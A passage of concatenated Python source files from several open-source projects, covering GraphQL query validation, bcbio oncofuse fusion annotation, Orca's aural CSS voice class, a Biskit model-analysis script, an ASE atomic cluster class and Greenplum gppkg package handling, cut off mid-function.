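_demo_buffer_id = create_buffer_id('MyGBK', kind='group')
assert _demo_buffer_id == b'group:MyGBK'
assert split_buffer_id(_demo_buffer_id) == ['group', 'MyGBK']
assert unique_name({'pcollection'}, 'pcollection') == 'pcollection_1'
assert unique_name({'pcollection'}, 'other') == 'other'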
# ---- charlesccychen/beam | sdks/python/apache_beam/runners/portability/fn_api_runner.py | Python | apache-2.0 ----
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import warnings
warnings.warn("pymatgen.analysis.elasticity.tensors has been moved to "
"pymatgen.core.tensors, please update dependencies accordingly. "
"Links will removed in v2019.1.1.")
from pymatgen.core.tensors import *
# ---- dongsenfo/pymatgen | pymatgen/analysis/elasticity/tensors.py | Python | mit ----
from ..error import GraphQLError
from ..language.ast import FragmentDefinition, FragmentSpread
from ..language.visitor import Visitor, visit
from ..utils import TypeInfo
from ..type import GraphQLSchema
from . import rules as Rules
specified_rules = [
Rules.UniqueOperationNames,
Rules.LoneAnonymousOperation,
Rules.KnownTypeNames,
Rules.FragmentsOnCompositeTypes,
Rules.VariablesAreInputTypes,
Rules.ScalarLeafs,
Rules.FieldsOnCorrectType,
Rules.UniqueFragmentNames,
Rules.KnownFragmentNames,
Rules.NoUnusedFragments,
Rules.PossibleFragmentSpreads,
Rules.NoFragmentCycles,
Rules.NoUndefinedVariables,
Rules.NoUnusedVariables,
Rules.KnownDirectives,
Rules.KnownArgumentNames,
Rules.UniqueArgumentNames,
Rules.ArgumentsOfCorrectType,
Rules.ProvidedNonNullArguments,
Rules.DefaultValuesOfCorrectType,
Rules.VariablesInAllowedPosition,
Rules.OverlappingFieldsCanBeMerged,
]
def validate(schema, ast, rules=None):
assert schema, 'Must provide schema'
assert ast, 'Must provide document'
assert isinstance(schema, GraphQLSchema)
if rules is None:
rules = specified_rules
return visit_using_rules(schema, ast, rules)
def visit_using_rules(schema, ast, rules):
type_info = TypeInfo(schema)
context = ValidationContext(schema, ast, type_info)
errors = []
for rule in rules:
instance = rule(context)
visit(ast, ValidationVisitor(instance, type_info, errors))
return errors
class ValidationVisitor(Visitor):
__slots__ = ['instance', 'type_info', 'errors', 'visit_spread_fragments']
def __init__(self, instance, type_info, errors):
self.instance = instance
self.type_info = type_info
self.errors = errors
self.visit_spread_fragments = getattr(self.instance, 'visit_spread_fragments', False)
def enter(self, node, key, parent, path, ancestors):
self.type_info.enter(node)
if isinstance(node, FragmentDefinition) and key and self.visit_spread_fragments:
return False
result = self.instance.enter(node, key, parent, path, ancestors)
if result and is_error(result):
append(self.errors, result)
result = False
if result is None and self.visit_spread_fragments and isinstance(node, FragmentSpread):
fragment = self.instance.context.get_fragment(node.name.value)
if fragment:
visit(fragment, self)
if result is False:
self.type_info.leave(node)
return result
def leave(self, node, key, parent, path, ancestors):
result = self.instance.leave(node, key, parent, path, ancestors)
if result and is_error(result):
append(self.errors, result)
result = False
self.type_info.leave(node)
return result
def is_error(value):
if isinstance(value, list):
return all(isinstance(item, GraphQLError) for item in value)
return isinstance(value, GraphQLError)
def append(arr, items):
if isinstance(items, list):
arr.extend(items)
else:
arr.append(items)
class ValidationContext(object):
__slots__ = ['_schema', '_ast', '_type_info', '_fragments']
def __init__(self, schema, ast, type_info):
self._schema = schema
self._ast = ast
self._type_info = type_info
self._fragments = None
def get_schema(self):
return self._schema
def get_ast(self):
return self._ast
def get_fragment(self, name):
fragments = self._fragments
if fragments is None:
self._fragments = fragments = {}
for statement in self.get_ast().definitions:
if isinstance(statement, FragmentDefinition):
fragments[statement.name.value] = statement
return fragments.get(name)
def get_type(self):
return self._type_info.get_type()
def get_parent_type(self):
return self._type_info.get_parent_type()
def get_input_type(self):
return self._type_info.get_input_type()
def get_field_def(self):
return self._type_info.get_field_def()
def get_directive(self):
return self._type_info.get_directive()
def get_argument(self):
return self._type_info.get_argument()
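# --- Added usage sketch (illustrative, not part of the library) ---
# is_error() treats a GraphQLError, or a non-empty list of them, as an
# error result; append() flattens either shape into the shared error list.
_demo_errors = []
append(_demo_errors, GraphQLError('boom'))
append(_demo_errors, [GraphQLError('a'), GraphQLError('b')])
assert is_error(_demo_errors)
assert len(_demo_errors) == 3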
# ---- jhgg/graphqllib | graphql/core/validation/__init__.py | Python | mit ----
"""annotate fusion outputs from STAR and Tophat
Supported:
oncofuse: http://www.unav.es/genetica/oncofuse.html
github: https://github.com/mikessh/oncofuse
"""
from __future__ import print_function
import os
import pysam
from bcbio.utils import file_exists
from bcbio.distributed.transaction import file_transaction
from bcbio.pipeline import config_utils
from bcbio.provenance import do
import bcbio.pipeline.datadict as dd
from bcbio.log import logger
# ## oncofuse fusion trancript detection
def run(data):
if not aligner_supports_fusion(data):
aligner = dd.get_aligner(data)
logger.warning("Fusion mode is not supported for the %s aligner, "
"skipping. " % aligner)
return None
config = data["config"]
genome_build = data.get("genome_build", "")
input_type, input_dir, input_file = _get_input_para(data)
if genome_build == "GRCh37": # assume genome_build is hg19 otherwise
if config["algorithm"].get("aligner") in ["star"]:
input_file = _fix_star_junction_output(input_file)
if config["algorithm"].get("aligner") in ["tophat", "tophat2"]:
input_file = _fix_tophat_junction_output(input_file)
elif "hg19" not in genome_build:
return None
    # Handle cases where the fusion file doesn't exist.
if not file_exists(input_file):
return None
out_file = os.path.join(input_dir, "oncofuse_out.txt")
if file_exists(out_file):
return out_file
oncofuse = config_utils.get_program("oncofuse", config)
tissue_type = _oncofuse_tissue_arg_from_config(data)
resources = config_utils.get_resources("oncofuse", config)
if not file_exists(out_file):
cl = [oncofuse]
cl += resources.get("jvm_opts", ["-Xms750m", "-Xmx5g"])
with file_transaction(data, out_file) as tx_out_file:
cl += [input_file, input_type, tissue_type, tx_out_file]
cmd = " ".join(cl)
try:
do.run(cmd, "oncofuse fusion detection", data)
except:
do.run("touch %s && echo '# failed' >> %s" % (tx_out_file, tx_out_file), "oncofuse failed", data)
#return out_file
return out_file
def is_non_zero_file(fpath):
return True if os.path.isfile(fpath) and os.path.getsize(fpath) > 0 else False
def aligner_supports_fusion(data):
SUPPORTED_ALIGNERS = ["tophat2", "tophat", "star"]
aligner = dd.get_aligner(data).lower()
return aligner in SUPPORTED_ALIGNERS
def _get_input_para(data):
TOPHAT_FUSION_OUTFILE = "fusions.out"
STAR_FUSION_OUTFILE = "Chimeric.out.junction"
config = data["config"]
is_disambiguate = len(config["algorithm"].get("disambiguate", [])) > 0
aligner = config["algorithm"].get("aligner")
if aligner == "tophat2":
aligner = "tophat"
names = data["rgnames"]
# set some default hard filters:
N = 2 # min. spanning reads
M = 4 # min. supporting reads (spanning + encompassing)
align_dir_parts = os.path.join(data["dirs"]["work"], "align", names["sample"])
align_dir_parts = os.path.join(align_dir_parts, data["genome_build"]) if is_disambiguate else align_dir_parts
if aligner in ["tophat", "tophat2"]:
align_dir_parts = os.path.join(data["dirs"]["work"], "align", names["sample"], names["lane"]+"_%s" % aligner)
return "tophat-%d-%d" % (N,M), align_dir_parts, os.path.join(align_dir_parts, TOPHAT_FUSION_OUTFILE)
if aligner in ["star"]:
star_junction_file = os.path.join(align_dir_parts, names["lane"]+STAR_FUSION_OUTFILE)
if is_disambiguate:
contamination_bam = data["disambiguate"][ config["algorithm"]["disambiguate"][0] ]
disambig_out_file = star_junction_file + "_disambiguated"
if file_exists(disambig_out_file):
star_junction_file = disambig_out_file
elif file_exists(star_junction_file) and file_exists(contamination_bam):
star_junction_file = _disambiguate_star_fusion_junctions(star_junction_file, contamination_bam,
disambig_out_file, data)
return "rnastar-%d-%d" % (N,M), align_dir_parts, star_junction_file
return None
def _fix_tophat_junction_output(chimeric_out_junction_file):
#for fusion.out
out_file = chimeric_out_junction_file + ".hg19"
with open(out_file, "w") as out_handle:
with open(chimeric_out_junction_file, "r") as in_handle:
for line in in_handle:
parts = line.split("\t")
left, right = parts[0].split("-")
leftchr = _h37tohg19(left)
rightchr = _h37tohg19(right)
if not leftchr or not rightchr:
continue
parts[0] = "%s-%s" % (_h37tohg19(left), _h37tohg19(right))
out_handle.write("\t".join(parts))
return out_file
def _fix_star_junction_output(chimeric_out_junction_file):
#for Chimeric.out.junction
out_file = chimeric_out_junction_file + ".hg19"
with open(out_file, "w") as out_handle:
with open(chimeric_out_junction_file, "r") as in_handle:
for line in in_handle:
parts = line.split("\t")
parts[0] = _h37tohg19(parts[0])
parts[3] = _h37tohg19(parts[3])
if not parts[0] or not parts[3]:
continue
out_handle.write("\t".join(parts))
return out_file
def _h37tohg19(chromosome):
MAX_CHROMOSOMES = 23
if chromosome in [str(x) for x in range(1, MAX_CHROMOSOMES)] + ["X", "Y"]:
new_chrom = "chr%s" % chromosome
elif chromosome == "MT":
new_chrom = "chrM"
# not a supported chromosome
else:
return None
return new_chrom
def _oncofuse_tissue_arg_from_config(data):
"""Retrieve oncofuse arguments supplied through input configuration.
tissue_type is the library argument, which tells Oncofuse to use its
own pre-built gene expression libraries. There are four pre-built
libraries, corresponding to the four supported tissue types:
EPI (epithelial origin),
HEM (hematological origin),
MES (mesenchymal origin) and
AVG (average expression, if tissue source is unknown).
"""
SUPPORTED_TISSUE_TYPE = ["EPI", "HEM", "MES", "AVG"]
if data.get("metadata", {}).get("tissue") in SUPPORTED_TISSUE_TYPE:
return data.get("metadata", {}).get("tissue")
else:
return "AVG"
def _disambiguate_star_fusion_junctions(star_junction_file, contamination_bam, disambig_out_file, data):
""" Disambiguate detected fusions based on alignments to another species.
"""
out_file = disambig_out_file
fusiondict = {}
for my_line in open(star_junction_file, "r"):
my_line_split = my_line.strip().split("\t")
if len(my_line_split) < 10:
continue
fusiondict[my_line_split[9]] = my_line.strip("\n")
samfile = pysam.Samfile(contamination_bam, "rb")
for my_read in samfile:
if 0x4 & my_read.flag or my_read.is_secondary: # flag 0x4 means unaligned
continue
if my_read.qname in fusiondict:
fusiondict.pop(my_read.qname)
with file_transaction(data, out_file) as tx_out_file:
myhandle = open(tx_out_file, 'w')
for my_key in fusiondict:
print(fusiondict[my_key], file=myhandle)
return out_file
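# --- Added usage sketch (not part of the module) ---
# _h37tohg19 maps GRCh37-style chromosome names onto hg19/UCSC-style names
# and returns None for unsupported contigs; the tissue argument falls back
# to the average-expression library when no metadata is supplied.
assert _h37tohg19('1') == 'chr1'
assert _h37tohg19('MT') == 'chrM'
assert _h37tohg19('GL000192.1') is None
assert _oncofuse_tissue_arg_from_config({'metadata': {'tissue': 'EPI'}}) == 'EPI'
assert _oncofuse_tissue_arg_from_config({}) == 'AVG'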
# ---- mjafin/bcbio-nextgen | bcbio/rnaseq/oncofuse.py | Python | mit ----
# Orca
#
# Copyright 2005-2008 Google Inc.
# Portions Copyright 2007-2008, Sun Microsystems, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
#
"""ACSS --- Aural CSS.
Class ACSS defines a simple wrapper for holding ACSS voice
definitions. Speech engines implement the code for converting
ACSS definitions into engine-specific markup codes.
"""
__id__ = "$Id$"
__author__ = "T. V. Raman"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2005-2008 Google Inc."
__license__ = "LGPL"
class ACSS(dict):
"""Holds ACSS representation of a voice."""
FAMILY = 'family'
RATE = 'rate'
GAIN = 'gain'
AVERAGE_PITCH = 'average-pitch'
PITCH_RANGE = 'pitch-range'
STRESS = 'stress'
RICHNESS = 'richness'
PUNCTUATIONS = 'punctuations'
# A value of None means use the engine's default value.
#
settings = {
FAMILY : None,
RATE : 50,
GAIN : 10,
AVERAGE_PITCH : 5,
PITCH_RANGE : 5,
STRESS : 5,
RICHNESS : 5,
PUNCTUATIONS : 'all'
}
def __init__(self, props=None):
"""Create and initialize ACSS structure."""
dict.__init__(self)
props = props or {}
if props:
for k in props:
if k == 'established' or k in ACSS.settings:
# Do a 'deep copy' of the family. Otherwise,
# the new ACSS shares the actual data with the
# props passed in. This can cause unexpected
# side effects.
#
if k == ACSS.FAMILY:
self[k] = {}
for j in props[k].keys():
self[k][j] = props[k][j]
else:
self[k] = props[k]
else:
self['established'] = False
def __setitem__ (self, key, value):
"""Update name when we change values."""
dict.__setitem__(self, key, value)
def __delitem__(self, key):
"""Update name if we delete a key."""
dict.__delitem__(self, key)
def name(self):
_name = 'acss-'
names = list(self.keys())
if names:
names.sort()
for k in names:
_name += "%s-%s:" % (k, self[k])
_name = _name[:-1]
return _name
def getLocale(self):
family = self.get(ACSS.FAMILY, {})
return family.get('locale')
def getDialect(self):
family = self.get(ACSS.FAMILY, {})
return family.get('dialect')
def update(self, newDict):
family = newDict.get(ACSS.FAMILY)
if isinstance(family, dict) and family.get('name') is None:
newDict.pop(ACSS.FAMILY)
return super().update(newDict)
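# --- Added usage sketch (illustrative, not part of Orca) ---
# Recognized keys from `props` are copied into the dict; name() derives a
# stable identifier from the sorted key/value pairs. The settings below
# are demo values only.
_demo_voice = ACSS({'rate': 60, 'average-pitch': 6})
assert _demo_voice['rate'] == 60
assert _demo_voice.name() == 'acss-average-pitch-6:rate-60'
assert ACSS()['established'] is False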
# ---- GNOME/orca | src/orca/acss.py | Python | lgpl-2.1 ----
#!/usr/bin/env python
##
## Biskit, a toolkit for the manipulation of macromolecular structures
## Copyright (C) 2004-2018 Raik Gruenberg & Johan Leckner
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 3 of the
## License, or any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You find a copy of the GNU General Public License in the file
## license.txt along with this program; if not, write to the Free
## Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
## Contributions: Olivier PERIN, Raik Gruenberg
from Biskit.Mod.Analyse import Analyse as A
from Biskit.Mod.ValidationSetup import ValidationSetup as VS
from Biskit.Mod.Benchmark import Benchmark as B
import Biskit.tools as T
import sys, os
import Biskit.Pymoler as Pymoler
def _use( o ):
print """
Syntax: analyse.py -d |main project folder| [-s |1||0|]
Result: Performing model analysis for each main project folder given.
Outputs a folder 'analyse' containing:
* analyse/global_results.out
various data about the model, see file header.
* analyse/local_results.out:
residue rmsd profile to target and mean rmsd to target
* modeller/final.pdb:
the 'best' model with the mean residue rmsd in the B-factor column
Options:
-d [str], list of project directory
-s show the structure final.pdb in PyMol
"""
for key, value in o.items():
print "\t-",key, "\t",value
sys.exit(0)
if __name__ == '__main__':
options = T.cmdDict()
f = os.getcwd()
if '?' in options or 'help' in options:
_use( options )
if not os.path.exists(f + VS.F_RESULT_FOLDER) and not options.has_key('d'):
print 'Current directory is not a valid modeling project folder.'
_use( options )
## Try to add project folders
## look for default cross-validation projects
d = []
if os.path.exists( f + VS.F_RESULT_FOLDER ):
d = [ f ]
if options.has_key('d'):
folders = T.toList(options['d'])
else:
folders = d
T.flushPrint("Starting job...\n")
for f in folders:
a = A(outFolder=f)
a.go()
T.flushPrint("Done.\n")
## show result in PyMol
if options.has_key('s'):
p=Pymoler()
p.addPdb( folders[0] + a.F_FINAL_PDB )
p.add('color_b')
p.add('select na, b<0')
p.add('color grey, na')
p.add('hide all')
p.add('show cartoon')
p.add('show stick')
p.add('hide stick, name o+c+n')
p.add('select ca, /////ca')
p.add('label ca,"%s-%s"%(resn, resi)')
p.add('select none')
p.show()
# ---- graik/biskit | archive_biskit2/scripts/Mod/analyse.py | Python | gpl-3.0 ----
import os
import math
import numpy as np
import pickle as pickle
from ase import Atoms
from ase.data import chemical_symbols
from ase.cluster.base import ClusterBase
class Cluster(Atoms, ClusterBase):
symmetry = None
surfaces = None
lattice_basis = None
resiproc_basis = None
atomic_basis = None
def copy(self):
cluster = Atoms.copy(self)
cluster.symmetry = self.symmetry
cluster.surfaces = self.surfaces.copy()
cluster.lattice_basis = self.lattice_basis.copy()
cluster.atomic_basis = self.atomic_basis.copy()
cluster.resiproc_basis = self.resiproc_basis.copy()
return cluster
def get_surfaces(self):
"""Returns the Miller indices of the stored surfaces of the cluster."""
if self.surfaces is not None:
return self.surfaces.copy()
else:
return None
def get_layers(self):
"""Return number of atomic layers in stored surfaces directions."""
layers = []
for s in self.surfaces:
n = self.miller_to_direction(s)
c = self.get_positions().mean(axis=0)
# Distance from the geometric center to the outermost atom along n.
r = np.dot(self.get_positions() - c, n).max()
# get_layer_distance(s, 2) spans two layers, so 2 * r / d estimates the
# layer count; the exact count is found among the neighboring candidates
# whose accumulated layer distance matches r.
d = self.get_layer_distance(s, 2)
l = 2 * np.round(r / d).astype(int)
ls = np.arange(l - 1, l + 2)
ds = np.array([self.get_layer_distance(s, i) for i in ls])
mask = (np.abs(ds - r) < 1e-10)
layers.append(ls[mask][0])
return np.array(layers, int)
def get_diameter(self, method='volume'):
"""Returns an estimate of the cluster diameter based on two different
methods.
method = 'volume': Returns the diameter of a sphere with the
same volume as the atoms. (Default)
method = 'shape': Returns the averaged diameter calculated from the
directions given by the defined surfaces.
"""
if method == 'shape':
cen = self.get_positions().mean(axis=0)
pos = self.get_positions() - cen
d = 0.0
for s in self.surfaces:
n = self.miller_to_direction(s)
r = np.dot(pos, n)
d += r.max() - r.min()
return d / len(self.surfaces)
elif method == 'volume':
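# The 'volume' estimate is the diameter of a sphere matching the cluster's
# total volume: each atom occupies V_cell / N_cell, so V = N * V_cell / N_cell.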
V_cell = np.abs(np.linalg.det(self.lattice_basis))
N_cell = len(self.atomic_basis)
N = len(self)
return 2.0 * (3.0 * N * V_cell /
(4.0 * math.pi * N_cell)) ** (1.0 / 3.0)
else:
return 0.0
#Functions to store the cluster
def write(self, filename=None):
if not isinstance(filename, str):
raise Warning('You must specify a valid filename.')
if os.path.isfile(filename):
os.rename(filename, filename + '.bak')
d = {'symmetry': self.symmetry,
'surfaces': self.surfaces,
'lattice_basis': self.lattice_basis,
'resiproc_basis': self.resiproc_basis,
'atomic_basis': self.atomic_basis,
'cell': self.get_cell(),
'pbc': self.get_pbc()}
f = open(filename, 'w')
f.write('Cluster')
pickle.dump(d, f)
pickle.dump(self.arrays, f)
f.close()
def read(self, filename):
if not os.path.isfile(filename):
raise Warning('The specified file does not exist.')
f = open(filename, 'r')
try:
if f.read(len('Cluster')) != 'Cluster':
raise Warning('This is not a compatible file.')
d = pickle.load(f)
self.arrays = pickle.load(f)
except EOFError:
raise Warning('Bad file.')
f.close()
self.symmetry = d['symmetry']
self.surfaces = d['surfaces']
self.lattice_basis = d['lattice_basis']
self.resiproc_basis = d['resiproc_basis']
self.atomic_basis = d['atomic_basis']
self.set_cell(d['cell'])
self.set_pbc(d['pbc'])
self.set_constraint()
self.adsorbate_info = {}
self.calc = None
|
suttond/MODOI
|
ase/cluster/cluster.py
|
Python
|
lgpl-3.0
| 4,164
|
[
"ASE"
] |
ca8c27e8c24c2296035aa73c02b4b99f68bf0af7f1e01782927444abbba45aa9
|
# Line too long - pylint: disable=C0301
# Copyright (c) Greenplum Inc 2011. All Rights Reserved.
from contextlib import closing
import os
import platform
import shutil
import sys
import tarfile
try:
from gppylib import gplog
from gppylib.commands import gp
from gppylib.commands.base import Command, REMOTE, WorkerPool, ExecutionError
from gppylib.commands.unix import Scp
from gppylib.gpversion import GpVersion
from gppylib.mainUtils import ExceptionNoStackTraceNeeded
from gppylib.operations import Operation
from gppylib.operations.utils import RemoteOperation, ParallelOperation
from gppylib.operations.unix import CheckFile, CheckDir, MakeDir, RemoveFile, RemoveRemoteTree, RemoveRemoteFile, CheckRemoteDir, MakeRemoteDir, CheckRemoteFile, ListRemoteFilesByPattern, ListFiles, ListFilesByPattern
from gppylib.utils import TableLogger
import yaml
from yaml.scanner import ScannerError
except ImportError, ex:
sys.exit('Operation: Cannot import modules. Please check that you have sourced greenplum_path.sh. Detail: ' + str(ex))
logger = gplog.get_default_logger()
def dereference_symlink(path):
"""
MPP-15429: rpm is funky with symlinks...
During an rpm -e invocation, rpm mucks with the /usr/local/greenplum-db symlink.
From strace output, it appears that rpm tries to rmdir any directories it may have created during
package installation. And, in the case of our GPHOME symlink, rpm will actually try to unlink it.
To avoid this scenario, we perform all rpm actions against the "symlink dereferenced" $GPHOME.
"""
path = os.path.normpath(path)
if not os.path.islink(path):
return path
link = os.path.normpath(os.readlink(path))
if os.path.isabs(link):
return link
return os.path.join(os.path.dirname(path), link)
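# Illustration (hypothetical paths): if /usr/local/greenplum-db is a symlink
# pointing at greenplum-db-4.2.0, then dereference_symlink('/usr/local/greenplum-db')
# returns '/usr/local/greenplum-db-4.2.0'; relative link targets are resolved
# against the symlink's parent directory.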
GPHOME = dereference_symlink(gp.get_gphome())
GPPKG_EXTENSION = '.gppkg'
SPECFILE_NAME = 'gppkg_spec.yml'
SPECFILE_REQUIRED_TAGS = ['pkgname', 'version', 'architecture', 'os', 'description', 'gpdbversion']
SPECFILE_OPTIONAL_TAGS = ['preinstall', 'postinstall', 'preuninstall', 'postuninstall', 'postupdate']
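# For illustration only: a minimal, hypothetical gppkg_spec.yml covering the
# required tags (actual values depend on the package being built):
#   Pkgname: postgis
#   Version: 1.0
#   Architecture: x86_64
#   OS: rhel5
#   Description: Geospatial extensions for Greenplum Database.
#   GPDBVersion: 4.2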
# TODO: AK: Our interactions with the internal RPM database could benefit from an abstraction layer
# that hides the underlying commands used for installation, uninstallation, queries, etc.
RPM_DATABASE_PATH = 'share/packages/database'
RPM_DATABASE = os.path.join(GPHOME, RPM_DATABASE_PATH)
RPM_INSTALLATION_PATH = GPHOME
# TODO: AK: Our interactions with the archive could benefit from an abstraction layer
# that hides the implementations of archival, unarchival, queries, etc.
# That is, consider the query "is this package already archived?" Currently, this is implemented
# with a CheckFile. Rather, it should be a call to Archive.contains(package), where package
# is instanceof Gppkg.
ARCHIVE_PATH = 'share/packages/archive'
GPPKG_ARCHIVE_PATH = os.path.join(GPHOME, ARCHIVE_PATH)
# TODO: AK: Shouldn't this be "$GPHOME/.tmp"?
# i.e. what if remote host has its $GPHOME elsewhere?
TEMP_EXTRACTION_PATH = GPHOME + '/.tmp'
DEPS_DIR = 'deps'
class GpdbVersionError(Exception):
'''
Exception to notify that the gpdb version
does not match
'''
pass
class AlreadyInstalledError(Exception):
def __init__(self, package_name):
Exception.__init__(self, '%s is already installed.' % package_name)
class NotInstalledError(Exception):
def __init__(self, package_name):
Exception.__init__(self, '%s is not installed.' % package_name)
class BuildPkgError(Exception):
'''
Exception to notify that there was an error during
the building of a gppkg
'''
pass
class MissingDependencyError(Exception):
'''
Exception to catch missing dependency
'''
def __init__(self, value):
Exception.__init__(self, 'Dependency %s is missing' % value )
class OSCompatibilityError(Exception):
'''
Exception to notify that OS does not meet the
requirement
'''
def __init__(self, requiredos, foundos):
Exception.__init__(self, '%s OS required. %s OS found' % (requiredos, foundos))
class ArchCompatibilityError(Exception):
'''
Exception to notify that architecture does not meet
the requirement
'''
def __init__(self, requiredarch, foundarch):
Exception.__init__(self, '%s Arch required. %s Arch found' % (requiredarch, foundarch))
class RequiredDependencyError(Exception):
'''
Exception to notify that the package being uninstalled
is a dependency for another package
'''
pass
class Gppkg:
'''
This class stores all the information about a gppkg
'''
def __init__(self, pkg, pkgname, main_rpm, version, architecture, os, gpdbversion, description, abspath, preinstall, postinstall, preuninstall, postuninstall, postupdate, dependencies, file_list):
'''
The constructor takes the following arguments
pkg The complete package name e.g pgcrypto-1.0-Darwin-i386.gppkg TODO: AK: This is an awful variable name. Change to "package_filename".
pkgname The name of the package as specified in the spec file
main_rpm The name of the main rpm. e.g PL/R, PostGIS etc
version The version of the gppkg
architecture The architecture for which the package is built
os The operating system for which the package is built
gpdbversion The Greenplum Database version for which package is built
description A short description for the package
abspath This is the absolute path where the package sits on the host
preinstall The cluster level preinstallation hooks
postinstall The cluster level postinstallation hooks
preuninstall The cluster level preuninstallation hooks
postuninstall The cluster level postuninstallation hooks
postupdate The cluster level postupdate hooks
dependencies The dependencies of the package. e.g Geos, Proj in case of PostGIS
file_list The list of files present in the package
'''
logger.debug('Gppkg Constructor')
self.pkg = pkg
self.pkgname = pkgname
self.main_rpm = main_rpm
self.version = version
self.architecture = architecture
self.os = os
self.gpdbversion = gpdbversion
self.description = description
self.abspath = abspath
self.preinstall = preinstall
self.postinstall = postinstall
self.preuninstall = preuninstall
self.postuninstall = postuninstall
self.postupdate = postupdate
self.dependencies = dependencies
self.file_list = file_list
@staticmethod
def from_package_path(pkg_path):
'''
This method takes a package as the argument and
obtains all the information about the package
Details include name, arch, OS, version, description, dependencies,
list of files present in the package and returns a gppkg object
'''
logger.debug('from_package_path')
if not os.path.exists(pkg_path):
logger.error('Cannot find package %s' % pkg_path)
raise IOError
#We check for a directory first because
#is_tarfile does not accept directories as path names
if os.path.isdir(pkg_path):
logger.error('%s is a directory!' % pkg_path)
raise IOError
if not tarfile.is_tarfile(pkg_path) or not pkg_path.endswith(GPPKG_EXTENSION):
logger.error('%s is not a valid package' % pkg_path)
raise IOError
if os.path.getsize(pkg_path) == 0:
logger.error('Package is empty')
raise IOError
pkg = {}
# XXX: AK: It's purely coincidence that the optional tags are lists.
for tag in SPECFILE_REQUIRED_TAGS:
pkg[tag] = ''
for tag in SPECFILE_OPTIONAL_TAGS:
pkg[tag] = []
pkg['file_list'] = []
pkg['dependencies'] = []
with closing(tarfile.open(pkg_path, 'r:gz')) as tarinfo:
#store the list of all files present in the archive
archive_list = tarinfo.getnames()
pkg["file_list"] = archive_list
#The spec file has to be called gppkg_spec
#so there will only be one such file,
#so we don't need to worry about the loop
#overwriting the 'specfile' variable with different values
for cur_file in archive_list:
if cur_file.endswith(SPECFILE_NAME):
specfile = tarinfo.extractfile(cur_file)
yamlfile = yaml.load(specfile)
keys = yamlfile.keys()
#store all the tags
for key in keys:
pkg[key.lower()] = yamlfile[key]
#update the pkgpath
pkg['pkg'] = os.path.split(pkg_path)[-1]
#store the version as a string
pkg['version'] = str(pkg['version'])
#Convert the required version to a GpVersion
pkg['gpdbversion'] = GpVersion(str(pkg['gpdbversion']))
#update the absolute path
pkg['abspath'] = pkg_path
#store all the dependencies of the gppkg
for cur_file in archive_list:
if cur_file.find('deps/') != -1 and cur_file.endswith('.rpm'):
pkg['dependencies'].append(cur_file[cur_file.rfind('/') + 1:])
#store the main rpm
for cur_file in archive_list:
if cur_file.find('deps/') == -1 and cur_file.endswith('.rpm'):
pkg['main_rpm'] = cur_file
gppkg = Gppkg(**pkg)
return gppkg
class LocalCommand(Operation):
'''
DEPRECATED
TODO: AK: Eliminate this. Replace invocations with Command(...).run(validateAfter = True)
'''
def __init__(self, cmd_str, echo = False):
self.cmd_str = cmd_str
self.echo = echo
def execute(self):
logger.debug(self.cmd_str)
cmd = Command(name = 'LocalCommand', cmdStr = self.cmd_str)
cmd.run(validateAfter = True)
if self.echo:
echo_str = cmd.get_results().stdout.strip()
if echo_str:
logger.info(echo_str)
return cmd.get_results()
class RemoteCommand(Operation):
"""
DEPRECATED
TODO: AK: Rename as GpSsh, like GpScp below.
"""
def __init__(self, cmd_str, host_list):
self.cmd_str = cmd_str
self.host_list = host_list
self.pool = None
def execute(self):
logger.debug(self.cmd_str)
# Create Worker pool
# and add commands to it
self.pool = WorkerPool()
for host in self.host_list:
cmd = Command(name = 'Remote Command', cmdStr = self.cmd_str, ctxt = REMOTE, remoteHost = host)
self.pool.addCommand(cmd)
self.pool.join()
#This will raise ExecutionError exception if even a single command fails
self.pool.check_results()
class ListPackages(Operation):
'''
Lists all the packages present in
$GPHOME/share/packages/archive
'''
def __init__(self):
pass
def execute(self):
# Ensure archive path exists
# TODO: AK: In hindsight, this should've been named MakeDirP,
# to reflect that it won't blow up if the path already exists.
MakeDir(GPPKG_ARCHIVE_PATH).run()
package_list = ListFilesByPattern(GPPKG_ARCHIVE_PATH, '*' + GPPKG_EXTENSION).run()
package_name_list = []
for pkg in package_list:
pkg_name = pkg.split('/')[-1]
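# Keep everything before the second '-', e.g. (hypothetical)
# 'postgis-1.0-rhel5-x86_64.gppkg' -> 'postgis-1.0'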
package_name_list.append(pkg_name[:pkg_name.index('-', pkg_name.index('-') + 1)])
return package_name_list
class CleanupDir(Operation):
'''
Cleans up the given dir
Returns True if either the dir is already removed
or if we were able to remove the dir successfully
False for other errors
'''
def __init__(self, dir_path):
self.dir_path = dir_path
def execute(self):
dir_path = self.dir_path
logger.debug('Cleaning up %s' % dir_path)
#If file does not exist, nothing to remove
#So we return true
if not os.path.exists(dir_path):
return True
if os.path.isdir(dir_path):
shutil.rmtree(dir_path)
else:
return False
return True
class IsVersionCompatible(Operation):
'''
Returns True if the gppkg is compatible
with the gpdb version that has been installed
'''
def __init__(self, gppkg):
self.gppkg = gppkg
def execute(self):
gppkg = self.gppkg
gpdb_version = self._get_gpdb_version()
required_gpdb_version = gppkg.gpdbversion
logger.debug('Greenplum Database Version = %s' % gpdb_version)
logger.debug('Required Greenplum Database version = %s' % required_gpdb_version)
if gpdb_version is None:
logger.error('Could not determine Greenplum Database version')
return False
if not required_gpdb_version.isVersionRelease(gpdb_version):
logger.error('%s requires Greenplum Database version %s' % (gppkg.pkgname, required_gpdb_version))
return False
if 'orca' not in gppkg.version and ".".join(map(str, gpdb_version.version)) >= '4.3.5':
logger.error('Greenplum Database requires orca version of %s' % (gppkg.pkg))
return False
return True
def _get_gpdb_version(self):
'''
Get the version of the current GPDB
Returns a string consisting of the major
release version
